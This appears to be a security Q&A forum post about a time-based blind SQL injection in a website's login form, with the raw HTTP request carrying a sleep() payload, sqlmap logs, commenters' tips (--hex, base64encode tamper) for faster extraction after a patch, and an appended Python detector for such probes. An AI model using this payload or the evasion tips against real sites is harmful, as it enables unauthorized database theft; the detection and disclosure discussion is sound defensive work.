
I recently discovered a time-based blind SQL injection attack on one of the websites. I was able to dump the data with 100 threads (by default, SQLmap doesn't allow more than 10, but I modified the source code) running in parallel at a rate of about 30 rows of records an hour.

POST /login HTTP/1.1
Host: somehost.com
Origin: https://somehost.com
Cookie: _session=AWFREYEH345gWwf4yyeGGwtw5ye987p520jwfREWT2qYKUYT43
Upgrade-Insecure-Requests: 1
Referer: https://somehost.com
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 81

username=CvtKevBJ'%2b(select*from(select(sleep(5)))a)%2b'&password=b2R%21e0p%21M5

3 days after I reported the issue, the developers mentioned that they had "applied a patch" and asked me to test again. The issue still existed. The payload above in the username field still caused a 5 second delay in the response; however, I could not extract the data at the same rate. It had significantly slowed down to some 3-ish records in 16 hours. SQLMap kept throwing this error:

[10:05:38] [ERROR] invalid character detected. retrying..
[10:05:38] [WARNING] increasing time delay to 23 seconds
[10:05:38] [ERROR] invalid character detected. retrying..
[10:05:38] [WARNING] increasing time delay to 24 seconds
[10:05:38] [ERROR] invalid character detected. retrying..
[10:05:38] [WARNING] increasing time delay to 25 seconds
[10:16:28] [ERROR] invalid character detected. retrying..
[10:16:28] [WARNING] increasing time delay to 26 seconds
[10:17:44] [ERROR] invalid character detected. retrying..
[10:17:44] [WARNING] increasing time delay to 27 seconds

I was wondering what patch it could have been.

7_R3X
  • Did you try using the --hex option to hex the payload and maybe be able to dump the data faster? – mrSotirow May 22 '21 at 08:02
  • @mrSotirow: Nope. Unfortunately, I did not. But do you know what could have been the reason behind it? – 7_R3X May 22 '21 at 13:16
  • Well, to be honest, no, but sometimes when I get this error I use --hex to hex the payload and it gets fixed; you can also try the base64encode tamper, maybe this will help. – mrSotirow May 22 '21 at 14:30
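A defender-side check for the kind of probe shown in the question, added here as an example that is not part of the question or the comments: it decodes the login form body, flags fields carrying a sleep()/benchmark()/WAITFOR-style payload, records whether the response time actually stalled, and counts probes per source, which is what a multi-threaded dump looks like in access logs. The sample requests, IPs and response times are constructed.

```python
import re
from urllib.parse import parse_qs

# Form-field content that indicates a time-based blind SQL injection probe:
# the MySQL sleep() form used in the question, plus the equivalent
# benchmark(), PostgreSQL pg_sleep() and MSSQL WAITFOR DELAY forms.
TIME_BASED_PATTERNS = re.compile(
    r"sleep\s*\(|benchmark\s*\(|pg_sleep\s*\(|waitfor\s+delay", re.IGNORECASE
)

# Constructed sample records (not real traffic): one per POST /login request,
# with the raw urlencoded body and the server-side response time in seconds.
SAMPLE_REQUESTS = [
    {"ip": "203.0.113.5", "rt": 0.12,
     "body": "username=alice&password=s3cret"},
    {"ip": "203.0.113.7", "rt": 5.21,
     "body": "username=CvtKevBJ'%2b(select*from(select(sleep(5)))a)%2b'&password=b2R%21e0p%21M5"},
    {"ip": "203.0.113.7", "rt": 5.18,
     "body": "username=CvtKevBJ'%2b(select*from(select(sleep(5)))a)%2b'&password=x"},
    {"ip": "198.51.100.9", "rt": 0.09,
     "body": "username=bob%27&password=pw"},
]


def injected_params(body):
    """Return the names of form fields whose decoded value matches a time-based probe."""
    fields = parse_qs(body, keep_blank_values=True)
    return sorted(name for name, values in fields.items()
                  if any(TIME_BASED_PATTERNS.search(v) for v in values))


def flag_requests(records, delay_threshold=4.0):
    """Flag records carrying a probe; delay_confirmed says whether the server really stalled."""
    findings = []
    for rec in records:
        params = injected_params(rec["body"])
        if params:
            findings.append({"ip": rec["ip"], "params": params,
                             "delay_confirmed": rec["rt"] >= delay_threshold})
    return findings


def probes_per_source(findings):
    """Count flagged requests per source IP; a high count indicates parallel extraction."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in flag_requests(SAMPLE_REQUESTS):
        print(f)
```

A confirmed delay on a flagged request means the payload reached the database, so the injection itself is still live regardless of how slowly rows can be extracted.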

0 Answers